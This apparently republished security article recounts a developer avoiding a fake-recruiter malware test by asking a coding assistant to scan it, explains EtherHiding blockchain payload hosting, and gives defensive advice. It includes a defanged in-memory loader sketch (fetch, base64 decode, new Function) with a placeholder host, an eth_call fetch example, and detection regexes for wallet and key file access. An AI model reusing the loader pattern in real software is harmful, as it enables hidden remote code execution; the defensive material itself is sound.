A single, almost‑throwaway prompt to an AI coding assistant appears to have stopped a full compromise in its tracks — and the episode should be a wake‑up call for developers, hiring teams, and security pros about how social engineering has evolved into a high‑precision, blockchain‑backed attack vector that targets the very people who build and secure our systems. The incident, described this week in investigative reporting and corroborated by multiple threat researchers, shows how a convincing fake recruiter and a seemingly normal coding test can deliver multi‑stage malware designed to steal credentials, seed phrases, and long‑term access — and how a simple “read this for suspicious patterns” prompt to a code assistant prevented a catastrophic mistake.
Background / Overview
The broader pattern here is already familiar to infosec teams: sophisticated social engineering campaigns target narrow, high‑value populations — notably software developers working in blockchain and cryptocurrency — because their machines often hold the keys to critical systems, wallets, and cloud credentials. In the case under discussion, the campaign used fake LinkedIn profiles, professional scheduling (Calendly), and a realistic Bitbucket repo to bait a developer into downloading and running a “test” project that contained malicious code. The developer, David Dodda, reported that he was about 30 seconds away from executing the repo when he asked his Cursor coding assistant to scan the codebase for suspicious behavior — the assistant flagged problematic patterns and the execution was stopped.
This “Contagious Interview” tradecraft has been tracked by security researchers and folded into more advanced infrastructure: the same actor cluster that has used fake job interviews and developer lures is now leveraging EtherHiding — storing JavaScript loader code in smart contracts on public blockchains so payloads can be fetched in a way that avoids takedowns and traditional web‑based detection. That evolution converts the immutable, decentralized properties of blockchains from a marketing advantage into a resilient command‑and‑control (C2) mechanism for malware distribution. Google’s Threat Intelligence analysts first documented this shift and researchers have corroborated the activity in independent writeups.
How the scam in this case worked
The recruitment bait and the test repo
- The attacker masqueraded as a high‑level executive from a legitimate company, complete with a convincingly recreated LinkedIn profile and polished outreach messages. The fake recruiter scheduled an interview, then insisted on a coding assessment — a standard hiring practice weaponized. The test repository looked professional: README, documentation, and even corporate‑style stock imagery. All of these signals lowered suspicion and created the impression of a legitimate hiring process.
- The repo contained a multi‑stage payload pattern: innocent‑looking code that, when executed, would fetch and run further artifacts; the malicious behavior is easy to miss on a quick read. In modern attack chains aimed at developers, the initial payload is often a small loader (JavaScript or native) that performs an “in‑memory” download of a more powerful backdoor or credential stealer — minimizing disk artifacts and evading casual inspection. A defanged illustration of this staging pattern follows below.
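What does that staging pattern look like in practice? The following TypeScript sketch is a defanged illustration, not code from the actual campaign: the URL is a placeholder and the encoding is an assumption. The tell is the combination of a runtime fetch, a decode step, and dynamic evaluation, with nothing written to disk.

```typescript
// DEFANGED illustration of a multi-stage loader pattern. Do not point this at real endpoints.

const STAGE2_URL = "https://example.invalid/config.json"; // placeholder; real lures bury this in helper code

async function loadRemoteConfig(): Promise<void> {
  // Looks like ordinary configuration loading...
  const response = await fetch(STAGE2_URL);
  const body = await response.text();

  // ...but the "config" is base64-encoded code, decoded entirely in memory.
  const decoded = Buffer.from(body, "base64").toString("utf8");

  // Dynamic evaluation: the second stage never touches disk, so file scanners see nothing.
  // Any eval(), new Function(), or vm.runInThisContext() in a "hiring test" should stop a review cold.
  new Function(decoded)();
}
```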
Why developers are the ideal target
- Developers’ workstations are high‑value targets: stored SSH keys, cloud access tokens, browser‑saved credentials, local crypto wallets, and privileged CI/CD agents all present a treasure trove to attackers. A single compromised dev machine can yield lateral access to source control, build systems, and production secrets.
- The social engineering lever — an exciting job opportunity or high‑paying freelance gig — is effective because it preys on normal developer behaviors: opening unfamiliar repos, running tests locally to check performance or completeness, and trusting code that appears to come from a legitimate corporate source.
EtherHiding: blockchain C2 and why it matters
How EtherHiding works (short technical explainer)
Attackers embed malicious data (JavaScript blobs, encoded payloads, or pointers to payloads) in smart contract storage on public blockchains (Ethereum, BNB Smart Chain). A loader executed on the victim machine performs a read‑only blockchain call (for example, an eth_call) to fetch that on‑chain data; because eth_call is a read‑only query answered by a node, it creates no transaction and leaves none of the traceability that traditional C2 infrastructure would. The immutable nature of the blockchain means defenders cannot simply take down a hosting server or remove the payload from the contract — the hosted data remains available and difficult to purge. Researchers observed the technique being used to deliver loaders and backdoors in campaigns that first surfaced this year.
Practical consequences
- Resilience to takedown: smart contract data is effectively permanent; defenders cannot delete a contract they don’t control.
- Low operational cost for attackers: updating on‑chain storage or deploying a new contract costs cents to a few dollars in gas, enabling rapid reconfiguration of payloads.
- Stealth: read‑only calls leave limited on‑chain footprints and can blend with normal client node activity, complicating detection.
- Cross‑platform reach: the loader can be a platform‑specific component (Windows, macOS, Linux) that interprets the on‑chain payload and executes further actions in memory, enabling the same on‑chain infrastructure to control diverse endpoints.
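To make the mechanics concrete, here is a minimal sketch of what such a read looks like at the JSON‑RPC level. The contract address, function selector, and endpoint below are placeholders, not indicators from the actual campaign; eth_call itself is the standard Ethereum JSON‑RPC read method.

```typescript
// Minimal sketch: a read-only eth_call at the JSON-RPC level.
// Address, selector, and endpoint are placeholders, not real indicators.

const RPC_URL = "https://example-rpc.invalid";  // any public Ethereum/BNB Smart Chain RPC endpoint
const CONTRACT = "0x0000000000000000000000000000000000000000"; // attacker-controlled contract (placeholder)
const SELECTOR = "0x00000000";                  // 4-byte selector of the getter that returns the payload

async function fetchOnChainData(): Promise<string> {
  const response = await fetch(RPC_URL, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      jsonrpc: "2.0",
      id: 1,
      method: "eth_call", // read-only: no transaction is created, nothing new is recorded on-chain
      params: [{ to: CONTRACT, data: SELECTOR }, "latest"],
    }),
  });
  const { result } = await response.json();
  return result; // hex-encoded return data; in EtherHiding, an encoded payload or a pointer to one
}
```

Because this is an ordinary HTTPS POST to a well‑known RPC provider, the traffic blends with legitimate dapp activity, which is exactly why the egress controls discussed later matter.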
The AI prompt that stopped it — what happened and why it worked
The developer in this account was preparing to run the sample project with only minutes to spare before an interview. Pressed for time, instead of sandboxing the code he began to examine and tidy it manually. Before executing anything, he asked his Cursor AI assistant: “Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn’t be reading, accessing crypto wallets etc.” That single request caused the assistant to highlight suspicious patterns and prevented an execution that would likely have led to credential and wallet theft. The developer credited that simple, pragmatic prompt with averting a disaster.
Why that worked:
- Pattern recognition at scale: modern coding assistants can quickly flag unusual API calls, suspicious network access, or code that reads filesystem locations where keys and wallets are typically stored (a deterministic version of this check is sketched after this list).
- Speed and simplicity: a quick automated review can surface red flags far faster than ad hoc human inspection, especially under time pressure.
- Reduced cognitive overhead: facing a convincing repo and a ticking clock, even experienced devs can make mistakes; an automated “safety check” provides an immediate second opinion.
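For teams that want a repeatable, offline version of that triage, below is a minimal TypeScript sketch. The pattern list is an illustrative assumption and far from exhaustive; an assistant does fuzzier matching than these regexes, and a clean scan is not a guarantee of safety.

```typescript
// Minimal sketch: deterministic pre-execution triage of a repo for suspicious patterns.
// Heuristic only; a clean result does NOT mean the code is safe.

import * as fs from "node:fs";
import * as path from "node:path";

// Illustrative red flags; extend with your own indicators.
const RED_FLAGS: { name: string; pattern: RegExp }[] = [
  { name: "dynamic code execution", pattern: /\beval\s*\(|new\s+Function\s*\(|vm\.runInThisContext/ },
  { name: "child process execution", pattern: /child_process|execSync|spawnSync/ },
  { name: "key/wallet file access", pattern: /\.ssh|id_rsa|keystore|wallet\.dat|metamask|exodus/i },
  { name: "runtime code fetch", pattern: /fetch\s*\(|axios|https?\.get|http\.request/ },
  { name: "large base64 blob", pattern: /[A-Za-z0-9+\/]{200,}={0,2}/ },
];

function scanDir(dir: string): void {
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory() && entry.name !== "node_modules" && entry.name !== ".git") {
      scanDir(full); // recurse into source directories
    } else if (entry.isFile() && /\.(js|ts|mjs|cjs|json)$/.test(entry.name)) {
      const text = fs.readFileSync(full, "utf8");
      for (const { name, pattern } of RED_FLAGS) {
        if (pattern.test(text)) console.log(`[!] ${name}: ${full}`);
      }
    }
  }
}

scanDir(process.argv[2] ?? "."); // e.g. npx ts-node scan.ts ./suspect-repo
```

Any hit is a reason to stop and read that file closely before anything runs.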
Practical, repeatable advice for developers and hiring teams
For developers: immediate tactical checks (what to do before running unknown code)
- Sandbox first: use an ephemeral virtual machine, container, or dedicated isolated environment with no access to your host’s secrets. Always treat external code as untrusted.
- Protect secrets: remove or lock access to SSH keys, cloud credentials, and wallet files before testing. Use different users or accounts with minimal privileges.
- Use static analysis: run automated linters, dependency scanners (SCA), and malware scanners that can detect suspicious packages and known bad indicators.
- Ask an assistant (responsibly): use a coding assistant prompt similar to the one in this case to perform a quick triage, for example:
- “Scan this repo and list any suspicious behaviors: filesystem reads to typical key/wallet locations, unexpected network calls, eval or dynamic code execution, or use of obfuscated code.”
- “Flag any third‑party dependencies that are not on known registries or that are recently published with few downloads.”
- Inspect third‑party dependencies: check package maintainers, recent release activity, and whether the package is used widely (a registry‑vetting sketch follows this list). Avoid running unknown npm modules or binary installers locally without additional scrutiny.
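One way to automate that dependency check is to query the public npm registry for a package’s age, maintainer count, and weekly downloads, as in the sketch below. The endpoints are npm’s public registry and download‑stats APIs; the thresholds are arbitrary assumptions to tune for your own risk appetite.

```typescript
// Minimal sketch: flag npm dependencies that are very new, thinly maintained, or rarely used.
// Thresholds are arbitrary; tune them for your environment.

async function vetPackage(name: string): Promise<void> {
  const res = await fetch(`https://registry.npmjs.org/${name}`);
  if (!res.ok) {
    console.log(`[!] ${name}: not on the public registry; major red flag`);
    return;
  }
  const meta = await res.json();

  const ageDays = (Date.now() - new Date(meta.time?.created).getTime()) / 86_400_000;
  const maintainers = (meta.maintainers ?? []).length;
  if (ageDays < 90) console.log(`[!] ${name}: first published only ${Math.round(ageDays)} days ago`);
  if (maintainers <= 1) console.log(`[!] ${name}: only ${maintainers} maintainer(s)`);

  // Weekly download counts come from a separate public endpoint.
  const dl = await fetch(`https://api.npmjs.org/downloads/point/last-week/${name}`);
  if (dl.ok) {
    const { downloads } = await dl.json();
    if (downloads < 1000) console.log(`[!] ${name}: only ${downloads} downloads last week`);
  }
}

vetPackage(process.argv[2] ?? "left-pad").catch(console.error);
```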
For hiring and recruiting teams: change the process to remove the attack surface
- Replace downloadable “take‑home” tests with:
- In‑browser editors that run in a sandboxed environment, or
- Live coding assessments behind authenticated platforms that use ephemeral instances and limit artifact download.
- Vet external recruiters and sourcing channels. Encourage candidates to confirm recruiter identities via corporate channels and avoid off‑platform scheduling where possible.
- Standardize secure assessment tooling: provide candidates with pre‑configured VMs or cloud sandboxes if they must test code locally.
- Train hiring staff to recognize red flags in candidate outreach pipelines and implement a verification workflow for recruiter profiles that appear out of band.
For security teams: platform and policy controls
- Block or restrict RPC endpoints that can be abused for eth_call downloads unless strictly needed in dev workflows; enforce node whitelisting and policy-based access controls (a minimal egress‑check sketch follows this list).
- Apply endpoint detection and response (EDR) controls that watch for in‑memory shells, unusual child processes, and suspicious network flows to block the dynamic stages of multi‑stage loaders.
- Increase telemetry from developer workstations: log file‑read patterns, npm installs, and new binary execution, and correlate with scheduled interviews or unusual external recruiters.
- Foster a culture where developers can refuse to run unvetted code without career penalty.
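As a starting point for the RPC restriction above, even a simple egress check can surface developer‑machine traffic to well‑known public RPC providers. In the sketch below the host list is a small illustrative sample and the event shape is a placeholder for whatever your proxy or EDR actually emits.

```typescript
// Minimal sketch: flag outbound requests from developer machines to public blockchain RPC hosts.
// Host list is an illustrative sample; extend it from your own threat intelligence.

const PUBLIC_RPC_HOSTS = new Set([
  "cloudflare-eth.com",
  "bsc-dataseed.binance.org",
  "rpc.ankr.com",
  "mainnet.infura.io",
]);

// Placeholder event shape; adapt to your proxy/EDR log schema.
interface EgressEvent { sourceHost: string; destinationHost: string; process: string }

function flagSuspiciousEgress(events: EgressEvent[]): EgressEvent[] {
  return events.filter((e) => {
    const dest = e.destinationHost.toLowerCase();
    // Match the host itself or any subdomain of it.
    return [...PUBLIC_RPC_HOSTS].some((h) => dest === h || dest.endsWith(`.${h}`));
  });
}

// Example: an arbitrary dev-box process talking to an RPC provider deserves a second look.
const hits = flagSuspiciousEgress([
  { sourceHost: "dev-laptop-17", destinationHost: "mainnet.infura.io", process: "node" },
]);
hits.forEach((e) => console.log(`[!] ${e.sourceHost} -> ${e.destinationHost} (${e.process})`));
```

Teams that legitimately build on-chain will trip this constantly; the goal is an allowlist‑plus‑review workflow, not a blanket block.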
Cross‑checking the wider threat landscape (contemporaneous campaigns)
This episode sits among multiple active campaigns and vulnerabilities that together paint a worrying picture of diversified adversary capability and opportunism.
- EtherHiding and UNC5342: Google Threat Intelligence documented EtherHiding and tied it to Contagious Interview campaigns; multiple reporting outlets corroborated those findings and described JADESNOW and INVISIBLEFERRET loaders and backdoors used to steal crypto and credentials. This corroboration comes from independent technical writeups and mainstream reporting.
- Cisco SNMP zero‑day (CVE‑2025‑20352) and “Operation ZeroDisco”: researchers at Trend Micro and multiple security outlets reported that attackers exploited a Cisco SNMP stack‑overflow vulnerability to deploy Linux rootkits on legacy switches. The operation installs persistent hooks into IOSd, sets a universal backdoor password (noted to include the word “disco”), and uses fileless components to evade detection. This shows that attackers are simultaneously refining infrastructure persistence and endpoint staging techniques.
- Fraudulently signed binaries and Rhysida: Microsoft reported that the financially motivated group tracked as Vanilla Tempest used fraudulently signed fake Microsoft Teams installers to deliver an Oyster backdoor and ultimately Rhysida ransomware. Microsoft revoked more than 200 certificates in a takedown action, demonstrating that adversaries combine social engineering, SEO poisoning, and supply‑chain trust to slip past defenses.
- SIMCARTEL disruption: European law enforcement dismantled an illegal SIM‑box service (operation SIMCARTEL) that facilitated large volumes of fraud and enabled criminals to create thousands of fake online identities. Authorities seized 1,200 SIM‑box devices and 40,000 active SIM cards, and attributed millions in losses to the operation — a reminder that telephony infrastructure and identity controls remain critical in the fraud ecosystem.
Critical analysis — strengths and weaknesses of the response shown, and systemic risks
What was done well in this case
- Quick thinking and defense‑in‑depth mindset: the developer asked for a quick automated second opinion and acted on suspicious findings instead of pressing “run” under time pressure.
- Use of an automated assistant as a triage tool — not an oracle — which reduced time to detection and complemented manual inspection.
- Public disclosure by the victim helps raise awareness and supplies practical indicators for defenders and hiring teams to update their playbooks.
Limitations and potential failure modes
- Over‑reliance on AI assistants is dangerous if the assistant is untrusted, offline, or itself compromised. Assistants may miss novel obfuscation patterns or misinterpret dynamic code; they are a helpful triage step, not a guarantee.
- Many teams lack secure assessment infrastructure. If take‑home tests remain downloadable by candidates, organizations will continue to provide an attack surface.
- The move to on‑chain C2 (EtherHiding) and fileless rootkits (ZeroDisco) increases forensic difficulty. Traditional takedown measures (server seizures, domain blacklisting) are less effective when payloads and control channels are decentralized or memory‑resident.
- Detection gaps on developer endpoints are systemic: EDR may not cover personal developer machines, and corporate developer devices often blur the line between personal and corporate assets, complicating telemetry and response.
Policy and governance implications
- Hiring platforms and social networks need better controls to detect and remove convincingly fake profiles used in these scams; this requires coordinated identity verification improvements and faster takedown workflows.
- Organizations should codify secure interviewing practices and provide candidates with secure, disposable testing environments to prevent off‑site execution of unverified code.
A practical checklist to reduce the odds of falling for a similar scam
- Never run unknown code on a machine that stores keys, credentials, or wallets.
- Insist hiring teams provide a sandboxed environment (cloud or VM) for any required take‑home tests.
- Use static analysis, SCA tools, and dependency heuristics before executing code.
- Rotate and minimize privileges: store keys in hardware wallets or dedicated key management systems; avoid local storage of production credentials.
- Maintain a forensic and incident response plan that accounts for novel C2 like blockchain reads and for fileless persistence patterns.
Closing assessment
This near‑miss is both instructive and alarming. It demonstrates that simple human judgement coupled with lightweight automation — in this case, a carefully framed assistant prompt — can stop a tailored attack in its tracks. But it also underlines a broader reality: attackers are evolving rapidly, combining social engineering, decentralized hosting (smart contracts), and traditional exploitation to create resilient supply chains for malware. Defenders must respond accordingly by hardening developer workflows, improving interview and hiring processes, deploying layered endpoint protections, and treating developer workstations as high‑value assets rather than interchangeable laptops.
The lessons are concrete: provide secure test environments for candidates, reduce the appeal of local code execution, instrument developer endpoints for anomalous behavior, and add immediate triage steps (both human and automated) before any code is executed. Simple prompts to an AI assistant can help triage risk — but only when combined with strong process controls and the discipline to avoid running unvetted artifacts on production machines.
For Windows administrators and IT managers, the immediate takeaways are operational: treat developer devices like servers in threat modeling; require sandboxed assessments; apply EDR policy that includes developer behaviors; and educate recruiters and hiring managers about the risks inherent in unstructured, downloadable test workflows. The adversary is using the tools and platforms developers like best; it’s time to make the developer experience secure by default, not secure by luck.
(Additional context and hiring/AI workflow discussion can be found in internal hiring‑tech threads and best‑practice guidance for AI usage in recruitment and interview design. See internal guidance summaries for pragmatic implementation steps.)
Source: theregister.com, “A simple AI prompt saved a developer from this scam”